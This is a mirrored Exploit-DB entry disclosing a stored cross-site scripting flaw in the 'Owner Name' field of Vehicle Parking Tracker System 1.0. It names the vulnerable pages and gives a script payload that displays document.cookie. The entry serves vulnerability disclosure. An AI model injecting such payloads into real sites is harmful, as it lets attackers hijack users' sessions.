bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/49509.txt
Offensive Security f7b4bca87b DB: 2021-02-02 
12 changes to exploits/shellcodes

MyBB Delete Account Plugin 1.4 - Cross-Site Scripting
Zoo Management System 1.0 - 'anid' SQL Injection
User Management System 1.0 - 'uid' SQL Injection
Park Ticketing Management System 1.0 - 'viewid' SQL Injection
MyBB Trending Widget Plugin 1.2 - Cross-Site Scripting
MyBB Thread Redirect Plugin 0.2.1 - Cross-Site Scripting
bloofoxCMS 0.5.2.1 - CSRF (Add user)
H8 SSRMS - 'id' IDOR
Vehicle Parking Tracker System 1.0 - 'Owner Name'  Stored Cross-Site Scripting
Roundcube Webmail 1.2 - File Disclosure
Klog Server 2.4.1 - Command Injection (Authenticated)
WordPress 5.0.0 - Image Remote Code Execution
2021-02-02 05:02:00 +00:00

17 lines
No EOL
744 B
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Vehicle Parking Tracker System 1.0 - 'Owner Name' Stored Cross-Site Scripting
# Date: 2021-01-30
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Software: : Vehicle Parking Tracker System
# Version : 1.0
# Vulnerability Type: Cross-site Scripting
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable script:
1) http://localhost/vpms/add-vehicle.php
# Vulnerable parameters: 'Owner Name'
# Payload used: ()"><script>alert(document.cookie)</script>
# POC: manage-incomingvehicle.php
# You will see your Javascript code executed.
Reference in a new issue View git blame Copy permalink